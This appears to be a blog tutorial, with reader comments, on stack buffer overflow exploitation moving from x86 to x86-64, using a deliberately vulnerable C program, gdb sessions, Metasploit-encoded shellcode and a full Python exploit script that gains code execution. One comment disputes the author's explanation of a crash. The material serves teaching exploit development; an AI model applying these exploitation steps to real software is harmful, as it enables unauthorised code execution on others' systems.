… or what a cool name for such a small thing
tl;dr
I thought that since every single CPU being sold in the last few years is 64 bits, it’s time to start getting familiar with it. Being on the offensive side of the fence I would like to check out how the change to 64 bits affects binary exploitation as we know it.
Disclaimer
This is by no means a complete discussion, just the result of a couple of days trying to satisfy my curiosity on the internets. It’s assumed you are familiar with basic x86 assembler and more or less with binary exploitation.
Intro
In order to start from scratch I’ll check the differences between x86 and x86-64 (relevant to this topic) and compare how a simple vulnerable program written in C translates to both instruction sets. There will be some “minor” differences which affect the way we have to approach the problem. I’ll mention this along the way in order of appearance.
Vanilla stack based buffer overflow
*yawn*
Well, I know this is boring but you have to start from the beginning, don’t you think? :)
Let’s review really fast what happens during a regular stack based buffer overflow, shall we?
Below a typical buffer overflow example. We call a function with a fixed size buffer allocated on the stack, the strcpy function writes beyond its boundaries and overwrites other system control parameters stored on the stack, among them the value of the stored EIP register. This will be loaded on the EIP register after the function ends and used to determine the address of the instruction the CPU is going to execute next.
root@yomama[~/code]
[15:03]:cat b0f.c
#include <string.h>
void
boom(char *str)
{
char buffer[128];
strcpy(buffer, str); // The horror…
}
int
main(int argc, char *argv[])
{
boom(argv[1]);
return 0;
}
Just to make the discussion more straightforward I’m going to compile without stack protection, DEP, ASLR this time.
“Small moves Ellie, small moves” (10 geek points if you recognize the movie reference without googling :))
root@yomama[~/code][15:02]:gcc -o b0f-32 -O2 -fno-stack-protector -D_FORTIFY_SOURCE=0 b0f.c
root@yomama[~/code][15:02]:file b0f-32
b0f-32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.15, dynamically linked (uses shared libs), not stripped
So we are set. Let’s run the program inside a debugger.
root@yomama[~/code]
[15:05]:gdb -q ./b0f-32
(no debugging symbols found)
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483e1 : lea ecx,[esp+0x4]
0x080483e5 : and esp,0xfffffff0
0x080483e8 : push DWORD PTR [ecx-0x4]
0x080483eb : push ebp
0x080483ec : mov ebp,esp
0x080483ee : push ecx
0x080483ef : sub esp,0×4
0x080483f2 : mov eax,DWORD PTR [ecx+0x4]
0x080483f5 : add eax,0×4
0x080483f8 : mov eax,DWORD PTR [eax]
0x080483fa : mov DWORD PTR [esp],eax
0x080483fd : call 0x80483c4
0×08048402 : mov eax,0×0
0×08048407 : add esp,0×4
0x0804840a : pop ecx
0x0804840b : pop ebp
0x0804840c : lea esp,[ecx-0x4]
0x0804840f : ret
End of assembler dump.
(gdb) disassemble boom
Dump of assembler code for function boom:
0x080483c4 : push ebp
0x080483c5 : mov ebp,esp
0x080483c7 : sub esp,0×88
0x080483cd : mov eax,DWORD PTR [ebp+0x8]
0x080483d0 : mov DWORD PTR [esp+0x4],eax
0x080483d4 : lea eax,[ebp-0x80]
0x080483d7 : mov DWORD PTR [esp],eax
0x080483da : call 0x80482f8
0x080483df : leave
0x080483e0 : ret
End of assembler dump.
(gdb) b *0x080483fd
Breakpoint 1 at 0x80483fd // breakpoint at CALL boom
(gdb) b *0x080483df
Breakpoint 2 at 0x80483df // breakpoint after the infamous strcpy call
I’ll run it with a small argument first, that is, no buffer overflow will happen.
(gdb) r AAAAAA
Starting program: /root/code/b0f-32 AAAAAA
Breakpoint 1, 0x080483fd in main ()
(gdb) x/8x $esp
0xbf9d86e0: 0xbf9d8e26 0xbf9d8700 0xbf9d8778 0xb773abd6
0xbf9d86f0: 0×08048420 0×00000000 0xbf9d8778 0xb773abd6
This is the breakpoint just before the CALL boom() instruction is executed. The top of the stack looks like above.
We continue the execution and hit the breakpoint right after the strcpy call.
Breakpoint 2, 0x080483df in boom ()
(gdb) x/8x $esp
0xbf9d8650: 0xbf9d8658 0xbf9d8e26 0×41414141 0×00004141
0xbf9d8660: 0xb78b3ff4 0xbf9d8750 0xb78b4ab0 0xbf9d8724
Look at the top of the stack now (remember we are inside boom(), so this is actually another stack frame, distinct from the main).
You can identify the beginning of our buffer filled with the 6 A’s from the argument.
Note: the first two dwords you see before are the arguments for the strcpy function itself, remember the breakpoint is at the leave instruction and they haven’t been cleaned yet.
Now what about the bottom of the stack?
You can recognize our previous “top of the stack” and the two new values:
0×08048402: pushed by the CALL instruction itself, the saved EIP value
0xbf9d86e8: pushed by boom() prologue, the saved value of EBP in order to reconstruct the old stack frame after it returns.
(gdb) x/8x $ebp
0xbf9d86d8: 0xbf9d86e8 0×08048402 0xbf9d8e26 0xbf9d8700
0xbf9d86e8: 0xbf9d8778 0xb773abd6 0×08048420 0×00000000
The important point here is that crucial values that determine execution flow are on the stack and susceptible to be changed by an attacker.
It’s a design flaw: user data and important system state information coexist on the same memory space.
If I copy too much data beyond my buffer I mangled those values…
(gdb) r $(python -c ‘print “A” * 200′) // copy 200 A’s
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/code/b0f-32 $(python -c ‘print “A” * 200′)
The top of the stack before EIP is pushed.
Breakpoint 1, 0x080483fd in main ()
(gdb) x/8x $esp
0xbfcc39c0: 0xbfcc3d64 0xbfcc39e0 0xbfcc3a58 0xb7751bd6
0xbfcc39d0: 0×08048420 0×00000000 0xbfcc3a58 0xb7751bd6
After the strcpy function wrote all those A’s
(gdb) c
Continuing.
Breakpoint 2, 0x080483df in boom ()
(gdb) x/8x $esp
0xbfcc3930: 0xbfcc3938 0xbfcc3d64 0×41414141 0×41414141
0xbfcc3940: 0×41414141 0×41414141 0×41414141 0×41414141
(gdb) x/8x $ebp
0xbfcc39b8: 0×41414141 0×41414141 0×41414141 0×41414141
0xbfcc39c8: 0×41414141 0×41414141 0×41414141 0×41414141
The saved EIP value (bold above) is now overwritten with 0×41414141. When the CPU loads this into EIP and tries to resume execution…
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0×41414141 in ?? ()
(gdb) info r
eax 0xbfcc3938 -1077135048
ecx 0×0 0
edx 0xc9 201
ebx 0xb7890ff4 -1215754252
esp 0xbfcc39c0 0xbfcc39c0
ebp 0×41414141 0×41414141
esi 0×0 0
edi 0×0 0
eip 0×41414141 0×41414141
eflags 0×10246 [ PF ZF IF RF ]
cs 0×73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0×0 0
gs 0×33 51
Boom. Now the idea is “I can write bytes (opcodes) into memory. I can control flow execution. I can tell the processor to go and execute my opcodes”. Great.
Wake up. Now comes the 64 bit stuff.
All this is very nice but you have seen it a million times, haven’t you?
Let’s compile the same code on a 64 bit machine.
carlos@zarafa:~/c0de$ file b0f
b0f: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
Let’s check out the assembly GCC generated from that code.
carlos@zarafa:~/c0de$ gdb -q ./b0f
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0×0000000000400570 <+0>: sub rsp,0×8
0×0000000000400574 <+4>: mov rdi,QWORD PTR [rsi+0x8]
0×0000000000400578 <+8>: call 0×400550
0x000000000040057d <+13>: xor eax,eax
0x000000000040057f <+15>: add rsp,0×8
0×0000000000400583 <+19>: ret
End of assembler dump.
(gdb) disassemble boom
Dump of assembler code for function boom:
0×0000000000400550 <+0>: sub rsp,0×88
0×0000000000400557 <+7>: mov rsi,rdi
0x000000000040055a <+10>: mov edx,0×80
0x000000000040055f <+15>: mov rdi,rsp
0×0000000000400562 <+18>: call 0×400450 <__strcpy_chk@plt>
0×0000000000400567 <+23>: add rsp,0×88
0x000000000040056e <+30>: ret
End of assembler dump.
There are some obvious differences:
- Generated code is smaller
- Look at the size of those addresses!
- Registers’ names look funny
- The QWORD reserved word
and some other not so obvious differences:
- Wait. Where are the function arguments being pushed?
- Where is the stack frame generation?
The well known E* registers (EAX, EBX, etc.) have been extended to 64 bits (though!) and they are named R* now (RAX, RBX, etc.) As with the transition from 16 bits to 32 the lower bits can be accessed through the old names, that is, EAX is the lower 32 bits of RAX, etc.
But more relevant for exploit development is the fact that in such a huge address range the code will be located at addresses of the form 0x00000000xxxxxxxx. This is going to be a problem for example in string based overflows. Null bytes always run the party but as we know there are workarounds for this annoyance.
However real changes on the architecture will probably have a higher impact on the way we write exploits.
For example, two related changes:
Did you notice the missing function prologue? Since the function uses the stack to store local variables it moves RSP to allocate some space for it but the bottom stack pointer (here it would be RBP) hasn’t been pushed into the stack.
It turns out that in x86-64 there is no such thing as bottom stack pointer.
And what about pushing the arguments’ address into the stack before a CALL?
In x86-64 the arguments (pointers and integers) are passed to the function via registers, reducing this way the number of memory accesses and resulting in a more efficient code.
I don’t like that either because the less important metadata on the stack the less chance I have to use a bug to overwrite potentially important stuff. meh…
Anyway, EIP is being saved in the stack as usual so let’s try to exploit this toy model.
First let’s check the offset I need in order to overwrite precisely the saved EIP value.
Since the function increments RSP in 0×88 and there’s no saved RBP looks like 136 bytes will do the trick.
carlos@zarafa:~/c0de$ gdb -q ./b0f
(gdb) set disassembly-flavor intel
(gdb) disassemble boom
Dump of assembler code for function boom:
0×0000000000400530 <+0>: sub rsp,0×88
0×0000000000400537 <+7>: mov rsi,rdi
0x000000000040053a <+10>: mov rdi,rsp
0x000000000040053d <+13>: call 0×400428
0×0000000000400542 <+18>: add rsp,0×88
0×0000000000400549 <+25>: ret
End of assembler dump.
(gdb) b *0×0000000000400530 // at the beginning of boom()
Breakpoint 1 at 0×400530
(gdb) b *0×0000000000400542 // right after strcpy
Breakpoint 2 at 0×400542
(gdb) r $(python -c ‘print “A” * 136 + “BCD”‘)
Starting program: /home/carlos/c0de/b0f $(python -c ‘print “A” * 136 + “BCD”‘)
Breakpoint 1, 0×0000000000400530 in boom ()
(gdb) p $rsp
$1 = (void *) 0x7fffffffe5f8 // The saved EIP value is stored here
(gdb) x/8x $rsp
0x7fffffffe5f8: 0x0040055d 0×00000000 0×00000000 0×00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0×00000000 0×00000000
(gdb) c
Continuing.
Breakpoint 2, 0×0000000000400542 in boom ()
(gdb) p $rsp
$2 = (void *) 0x7fffffffe570 // The beginning of our payload
(gdb) x/8x $rsp
0x7fffffffe570: 0×41414141 0×41414141 0×41414141 0×41414141
0x7fffffffe580: 0×41414141 0×41414141 0×41414141 0×41414141
(gdb) x/8x 0x7fffffffe5f8 // overwritten!
0x7fffffffe5f8: 0×00444342 0×00000000 0×00000000 0×00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0×00000000 0×00000000
So we overwrote the EIP value. Neat.
Now in x86 with an easy example like this (no stack cookies, no DEP/ASLR) we would look for an address containing something like jmp esp, execute it and land in our shellcode. However, in this really short code it’s not probable that I will be able to find the required instruction.
So for this toy model I’m going to just hardcode the address of the top of the stack.
Flamewars ahead, I know :)
(gdb) r $(python -c ‘print “A” * 136 + “x70xe5xffxffxffx7f”‘)
Breakpoint 1, 0×0000000000400530 in boom () // at the very beginning of boom()
(gdb) x/8x $rsp // saved EIP value
0x7fffffffe5f8: 0x0040055d 0×00000000 0×00000000 0×00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0×00000000 0×00000000
(gdb) b *0×0000000000400542
Breakpoint 2 at 0×400542
(gdb) c
Continuing.
Breakpoint 2, 0×0000000000400542 in boom ()
(gdb) x/8x 0x7fffffffe5f8 // overwritten!
0x7fffffffe5f8: 0xffffe570 0×00007fff 0×00000000 0×00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0×00000000 0×00000000
(gdb) x/8x 0x7fffffffe570 // showing my s
0x7fffffffe570: 0×41414141 0×41414141 0×41414141 0×41414141
0x7fffffffe5c8: 0×41414141 0×41414141 0×41414141 0×41414141
(gdb) si // single step
0×0000000000400549 in boom () // This is the RET instruction at the end of boom()
(gdb) si // single step
0x00007fffffffe570 in ?? () // hmmmm…
(gdb) info reg
rax 0x7fffffffe570 140737488348528
rbx 0×0 0
rcx 0×0 0
rdx 0x7fffffffe5fe 140737488348670
rsi 0x7fffffffe9a0 140737488349600
rdi 0x7fffffffe570 140737488348528
rbp 0×0 0×0
rsp 0x7fffffffe600 0x7fffffffe600
r8 0xfefefefefefefeff -72340172838076673
r9 0xffffffffffffff00 -256
r10 0x7fffffffe310 140737488347920
r11 0x7ffff7adcce0 140737348750560
r12 0×400440 4195392
r13 0x7fffffffe6e0 140737488348896
r14 0×0 0
r15 0×0 0
rip 0x7fffffffe570 0x7fffffffe570 // execution is here
eflags 0×202 [ IF ]
cs 0×33 51
ss 0x2b 43
ds 0×0 0
es 0×0 0
fs 0×0 0
gs 0×0 0
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe570 in ?? ()
(gdb) x/8x $rip
0x7fffffffe570: 0×41414141 0×41414141 0×41414141 0×41414141
0x7fffffffe5c8: 0×41414141 0×41414141 0×41414141 0×41414141
Hey, what’s with the weird crash?
Hmmm… What has just happened? Everything looked fine, I was able to overwrite the saved EIP value and redirect execution to my buffer. But it crashes when trying to execute the first instruction…
Damn, is there any kind of NX mechanism in place, marking the stack as non-executable?
After inspecting my system, the NX bit isn’t activated and the binary hasn’t been compiled with any other kind of stack execution prevention.
What about the instructions I’m trying to execute?
What does the opcode 0×41 (or 0×4141) mean in x86-64?
It turns out that while in x86 the opcode 0×41 corresponds to INC EAX and therefore is some kind of NOP, suitable for a PoC or first sketch of your exploit… in x86-64 is something completely different :)
The bytes 0x4X don’t have any meaning by themselves but they are prefixes necessary to address the 16 registers (they weren’t necessary in x86, with only 8 GPRs)
NOTE: This difference in the opcode translation is leveraged in a very neat trick in order to make your shellcode architecture independent. Read more here.
Long story short, don’t use “A”s as junk when developing your exploit or it will become somehow confusing with all those crashes :)
Instead you can use good old 0×90 NOPs or something less obvious like for example 0x24FF which translates to AND AL, 0xFF.
Finish him!
OK, back to the exploit. Now that I know that I can jump to my payload and it will be executed let’s put some simple metasploit magic there.
root@yomama[~]
[20:47]:msfpayload linux/x64/exec CMD=”echo PWND” R | msfencode -b ‘x00′ -e x64/xor -t c
[*] x64/xor succeeded with size 95 (iteration=1)
unsigned char buf[] =
“x48x31xc9x48x81xe9xf9xffxffxffx48x8dx05xefxff”
“xffxffx48xbbxc5xb6x57xccxbfx7ax60xc7x48x31x58″
“x27x48x2dxf8xffxffxffxe2xf4xafx8dx0fx55xf7xc1″
“x4fxa5xacxd8x78xbfxd7x7ax33x8fx4cx51x3fxe1xdc”
“x7ax60x8fx4cx50x05x24xb5x7ax60xc7xa0xd5x3fxa3″
“x9fx2ax37x89x81xb6x01x9bxf7xf3x86xc8xc0xb6x57″
“xccxbfx7ax60xc7″;
Nothing fancy.
So putting all together, the exploit will look like this:
carlos@zarafa:~/c0de$ cat pwn64.py
#
# Simple 64 bits b0f example
# Little and cute.
#
offset_to_eip = 136
# msfpayload linux/x64/exec CMD=”echo PWND” R | msfencode -b ‘x00′ -e x64/xor -t c
# [*] x64/xor succeeded with size 95 (iteration=1)hellcode = (
“x48x31xc9x48x81xe9xf9xffxffxffx48x8dx05xefxff”
“xffxffx48xbbxc5xb6x57xccxbfx7ax60xc7x48x31x58″
“x27x48x2dxf8xffxffxffxe2xf4xafx8dx0fx55xf7xc1″
“x4fxa5xacxd8x78xbfxd7x7ax33x8fx4cx51x3fxe1xdc”
“x7ax60x8fx4cx50x05x24xb5x7ax60xc7xa0xd5x3fxa3″
“x9fx2ax37x89x81xb6x01x9bxf7xf3x86xc8xc0xb6x57″
“xccxbfx7ax60xc7″)# jmp to shellcode at 0x7fffffffe570
# Note I only write six bytes. The two leading 0×00 bytes
# (64 bit address) are already on the stack.
eip = “x70xe5xffxffxffx7f”string = hellcode + (“x24xFF” * 20) + “x90″ + eip # hardcoded, nasty
print string
This python script will generate the string used as argument. Let’s follow the execution inside the debugger…
carlos@zarafa:~/c0de$ gdb -q ./b0f
(gdb) set disassembly-flavor intel
(gdb) disassemble boom
Dump of assembler code for function boom:
0×0000000000400530 <+0>: sub rsp,0×88
0×0000000000400537 <+7>: mov rsi,rdi
0x000000000040053a <+10>: mov rdi,rsp
0x000000000040053d <+13>: call 0×400428
0×0000000000400542 <+18>: add rsp,0×88
0×0000000000400549 <+25>: ret
End of assembler dump.
(gdb) b* boom // breakpoint at the beginning
Breakpoint 1 at 0×400530
(gdb) b* 0×0000000000400549 // breakpoint at the RET instruction
Breakpoint 2 at 0×400549
(gdb) r $(python pwn64.py)
Starting program: /home/carlos/c0de/b0f $(python pwn64.py)
Breakpoint 1, 0×0000000000400530 in boom ()
(gdb) x/8x $rsp // The saved EIP value
0x7fffffffe5f8: 0x0040055d 0×00000000 0×00000000 0×00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0×00000000 0×00000000
(gdb) c
Continuing.Breakpoint 2, 0×0000000000400549 in boom ()
(gdb) x/8x $rsp // overwritten!
0x7fffffffe5f8: 0xffffe570 0×00007fff 0×00000000 0×00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0×00000000 0×00000000
(gdb) x/32x 0x7fffffffe570 // Our payload is on the stack
0x7fffffffe570: 0x48c93148 0xfff9e981 0x8d48ffff 0xffffef05
0x7fffffffe580: 0xc5bb48ff 0xbfcc57b6 0x48c7607a 0×48275831
0x7fffffffe590: 0xfffff82d 0xaff4e2ff 0xf7550f8d 0xaca54fc1
0x7fffffffe5a0: 0xd7bf78d8 0x4c8f337a 0xdce13f51 0x4c8f607a
0x7fffffffe5b0: 0xb5240550 0xa0c7607a 0x9fa33fd5 0x8189372a
0x7fffffffe5c0: 0xf79b01b6 0xc0c886f3 0xbfcc57b6 0x24c7607a
0x7fffffffe5d0: 0x24ff24ff 0x24ff24ff 0x24ff24ff 0x24ff24ff
0x7fffffffe5e0: 0x24ff24ff 0x24ff24ff 0x24ff24ff 0x24ff24ff
(gdb) si
0x00007fffffffe570 in ?? () // single stepping takes me to it
(gdb) p $rip
$1 = (void (*)()) 0x7fffffffe570
(gdb) c
Continuing.
process 11209 is executing new program: /bin/dash
PWND
Program exited normally.
(gdb)
Note again the issue with the huge addresses. I didn’t have to write the two leading zeroes in the address I used to overwrite EIP. The zeros were already there (well technically I wrote one of them with the string terminator).
This will always be the case since the address at this position is the saved EIP (on the .text section and therefore of the form 0x00000000XXXXXXXX)
That was long…
As you can see exploitation of string based buffer overflows in x86-64 is similar to their counterparts in x86, at least at this baby level.
Presumably as we add more complexity to the arena, Unicode, DEP, ASLR, etc. the nuances like different opcode translation, null bytes in every address, lack of EBP equivalent and so on will have a bigger effect in the way we solve the problem.
But let’s not forget that x86-64 brings as well some completely new features like for example conditional moves . It would be nice to find ways to leverage this new stuff in order to create new exploitation methods unique to this platform.
The future looks exciting :)
References:
“Corelan Exploit Writing Tutorials” (focus on x86)
The “weird crash” is not caused by the meaning of the op-code.
The reason you get a crash of EIP 0×41414141 on x32 is because when the program pops the previously saved EIP value off the stack and back into EIP the CPU then tries to execute the instruction at memory address 0×41414141 which causes a segfault. (it must fetch the page prior to execution of course)
Now, during x64 execution when the program pops the previously saved RIP value back into the RIP register the kernel then tries to execute the instructions at memory address 0×4141414141414141. Firstly, due to canonical form addressing, bits 48 through 63 of any virtual address must be copies of bit 47 (in a manner akin to sign extension), or the processor will raise an exception. If that was not an issue- the kernel does additional checks before invoking the page fault handler since the max user space address is 0x00007FFFFFFFFFF.
To recap, in x32 architecture the address is passed without any “validation” to the page fault handler which attempts to load the page which triggers the kernel to send the program segfault but x64 does not get this far.
Test it, overwrite RIP with 0×0000414141414141 and you will see the expected value is placed in RIP since the prechecks by the kernel pass and then the the page fault handler is invoked like the x32 case (which of course, then causes the program to crash).
Hi Andy,
thanks for this precise and extensive technical explanation! :)